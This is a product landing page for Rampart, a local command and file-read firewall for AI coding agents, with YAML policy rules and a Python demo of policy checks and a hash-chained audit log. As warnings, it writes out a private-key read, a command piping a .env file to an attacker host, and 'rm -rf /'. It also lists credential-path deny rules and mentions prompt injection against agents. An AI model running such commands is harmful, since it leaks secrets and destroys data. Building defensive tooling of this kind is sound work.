v0.9.5  ·  now with response scanning

Your agent has root.
That's the problem.

Rampart sits between your agent and your system. Every command evaluated against your YAML policy before it runs. One binary. No cloud. No latency your agent can feel.

$ brew install peg/tap/rampart
Installs to ~/.local/bin. No sudo required.

What your agent can do right now

Claude Code's --dangerously-skip-permissions. Codex's --full-auto mode. They trade safety for speed. Here's what that actually means.

$ cat ~/.ssh/id_rsa
$ cat .env | curl -X POST https://attacker.io/collect -d @-
$ rm -rf /

No guardrails. No audit log. No way to know it happened.

What your agent did today.

Every operation in real time. Green means go. Red means stopped. You see everything before it happens.

rampart watch — agent-01 live

See exactly what your agent does, then generate rules from the audit log.

Sandboxes lock your agent down.
Rampart just stops the dangerous stuff.

Sandboxes block npm install, git clone, and every API call your agent needs to work. Rampart allows all of that and blocks credential reads, exfiltration, and destructive commands.

Sandbox approach
  ✗ npm install        # denied
  ✗ git clone          # denied
  ✗ curl staging.api   # denied
  ✗ go build ./...     # denied
  Result: agent stuck

Rampart approach
  ✓ npm install        # allowed
  ✓ git clone          # allowed
  ✓ go build ./...     # allowed
  ✗ cat ~/.ssh/id_rsa  # blocked
  Result: work continues

A seatbelt, not a cage.

You set the rules, or use ours. Rampart allows what your agent needs and blocks what it doesn't. 40+ policies, every decision local, in microseconds.

01
Policy enforcement
Every command evaluated before it runs. 95%+ of decisions happen instantly via pattern matching. For edge cases, there's an optional LLM sidecar (rampart-verify) you can enable when you need it.
02
Response scanning
If your agent reads a file containing credentials, the response is blocked before those secrets enter the agent's context window. Most tools only filter what goes out. Rampart also filters what comes back in.
03
Prompt injection resistant
Rampart enforces policies from outside the agent process (through the hooks, LD_PRELOAD, or wrapper shim integrations listed below), not from inside its prompt, so the agent has no handle on them. A prompt injection telling your agent to disable its guardrails doesn't help: policy changes have to be made by a human, in the policy files on disk.
04
Approval gates
Some commands you want a human to approve before they run. Set action: require-approval on any rule and Rampart holds the command until you say yes or no.
05
Tamper-evident audit
Every allow, deny, and approval is logged in a hash-chained file. You can't edit the history without breaking it. Run rampart audit to see what your agent actually did, then feed the log back to generate new policies.
8 µs policy eval
40+ built-in rules
95% via pattern match
0 cloud deps

Works with everything you're already running.

One command per agent. Or run rampart setup with no args and it finds everything installed.

Claude Code
hooks + bridge  ·  ✓ native
$ rampart setup claude-code
Codex CLI
hooks + bridge  ·  ✓ native
$ rampart setup codex
Cline
LD_PRELOAD  ·  ✓ native
$ rampart setup cline
OpenClaw
shim + bridge  ·  ✓ native
$ rampart setup openclaw
Any agent
shim  ·  ✓ universal
$ rampart wrap -- <cmd>

It's just YAML.

No DSL, no SDK, no proprietary format. 40+ policies included. The YAML below, taken from the bundled standard policy, shows the shape of a rule: match on a tool, list the conditions, name the action.

~/.rampart/policies/standard.yaml
version: "1"
policies:
  - name: block-credential-leak
    match:
      tool: file.read
    rules:
      - when:
          path_matches:
            - "**/.env"
            - "**/.ssh/*"
            - "**/id_rsa"
        action: deny
        message: "Credential access blocked"

  - name: require-approval-outbound
    match:
      tool: http
    rules:
      - when:
          url_not_in_allowlist: true
        action: require-approval
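The Python below is an added example, not Rampart's own code, written to show what the policy above and the hash-chained audit log from the feature list mean in practice: each tool call is evaluated against the two policies, the decision is appended to a log whose entries each commit to the previous entry's hash, and a later edit to one entry is detected. The glob semantics, the allowlist contents, the log schema and the allow-by-default fallback are assumptions made for the example, not Rampart's documented behaviour; the policy is embedded as a Python dict so the example runs without a YAML library.

```python
"""Toy policy evaluator plus hash-chained audit log (added example, not Rampart's code)."""
import hashlib
import json
import re

# The two policies from standard.yaml above, transcribed into a dict (no YAML parser needed).
POLICIES = [
    {"name": "block-credential-leak",
     "match": {"tool": "file.read"},
     "rules": [{"when": {"path_matches": ["**/.env", "**/.ssh/*", "**/id_rsa"]},
                "action": "deny", "message": "Credential access blocked"}]},
    {"name": "require-approval-outbound",
     "match": {"tool": "http"},
     "rules": [{"when": {"url_not_in_allowlist": True},
                "action": "require-approval"}]},
]

# Assumed allowlist for the http policy; the page does not show where Rampart keeps it.
URL_ALLOWLIST = ("https://api.github.com/", "https://registry.npmjs.org/")


def glob_to_regex(pattern):
    """Assumed glob semantics: '**/' matches any directory prefix, '*' one path segment."""
    out, i = "", 0
    while i < len(pattern):
        if pattern.startswith("**/", i):
            out += "(?:.*/)?"
            i += 3
        elif pattern[i] == "*":
            out += "[^/]*"
            i += 1
        else:
            out += re.escape(pattern[i])
            i += 1
    return re.compile("^" + out + "$")


def evaluate(tool, target):
    """Return (action, policy_name, message) for one tool call.

    Falls through to 'allow' when no rule matches, mirroring the page's allow-by-default stance."""
    for policy in POLICIES:
        if policy["match"]["tool"] != tool:
            continue
        for rule in policy["rules"]:
            cond = rule["when"]
            if "path_matches" in cond and any(glob_to_regex(p).match(target) for p in cond["path_matches"]):
                return rule["action"], policy["name"], rule.get("message", "")
            if cond.get("url_not_in_allowlist") and not target.startswith(URL_ALLOWLIST):
                return rule["action"], policy["name"], rule.get("message", "")
    return "allow", None, ""


GENESIS = "0" * 64  # prev-hash of the first entry


def _digest(body):
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


def append_entry(log, tool, target, action, policy):
    """Append an audit entry whose hash covers its fields and the previous entry's hash."""
    prev = log[-1]["hash"] if log else GENESIS
    body = {"seq": len(log), "tool": tool, "target": target,
            "action": action, "policy": policy, "prev": prev}
    body["hash"] = _digest({k: v for k, v in body.items()})
    log.append(body)
    return body


def verify_chain(log):
    """Return the index of the first entry that fails verification, or -1 if the chain is intact."""
    prev = GENESIS
    for i, entry in enumerate(log):
        body = {k: v for k, v in entry.items() if k != "hash"}
        if body.get("prev") != prev or _digest(body) != entry["hash"]:
            return i
        prev = entry["hash"]
    return -1


def run_demo():
    """Evaluate a few constructed tool calls, log them, then tamper with one entry."""
    log, decisions = [], []
    requests = [  # constructed sample calls, not captured agent traffic
        ("file.read", "/home/dev/project/src/main.go"),
        ("file.read", "/home/dev/.ssh/id_rsa"),
        ("file.read", "/home/dev/project/.env"),
        ("http", "https://registry.npmjs.org/left-pad"),
        ("http", "https://attacker.io/collect"),
    ]
    for tool, target in requests:
        action, policy, _ = evaluate(tool, target)
        append_entry(log, tool, target, action, policy)
        decisions.append(action)
    intact = verify_chain(log)
    log[1]["action"] = "allow"  # rewrite history: pretend the key read was allowed
    tampered = verify_chain(log)
    return decisions, intact, tampered


if __name__ == "__main__":
    print(run_demo())
```

Editing the stored entry changes its digest, so verify_chain stops at index 1; an editor who also recomputes that entry's hash only moves the break to entry 2, whose prev link no longer matches. What a bare chain cannot detect is removal of the newest entries, so the latest hash is worth recording somewhere the agent cannot write.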

I built Rampart after my own agent nearly nuked a directory on my homelab

Trevor  ·  @peg  ·  creator of Rampart
This isn't a security research project or a VC-funded platform. It's a tool built by someone who runs AI agents every day and got burned by the lack of guardrails. The fail-open philosophy (allow by default, block the dangerous stuff) came from getting tired of sandboxes that fight you harder than the agents they're supposed to protect.

Two commands.

setup auto-detects Claude Code, Codex, Cline, and OpenClaw. Your agent is protected the next time you run it.

1
Install
$ brew install peg/tap/rampart
$ curl -fsSL https://rampart.sh/install | sh
2
Set up your agents
$ rampart setup
Run your agent normally. Rampart is already protecting it.

Rampart + Snare

Rampart blocks dangerous operations before they execute. Snare catches what slips through. Different tools, same mission, designed to work together.

Rampart
rampart.sh
Policy firewall for AI agents. Blocks commands, file reads, and network requests before they execute.
Snare
snare.sh
Credential canary tokens. Know the instant stolen credentials are used, even weeks after the fact.

Rampart blocks. Snare catches.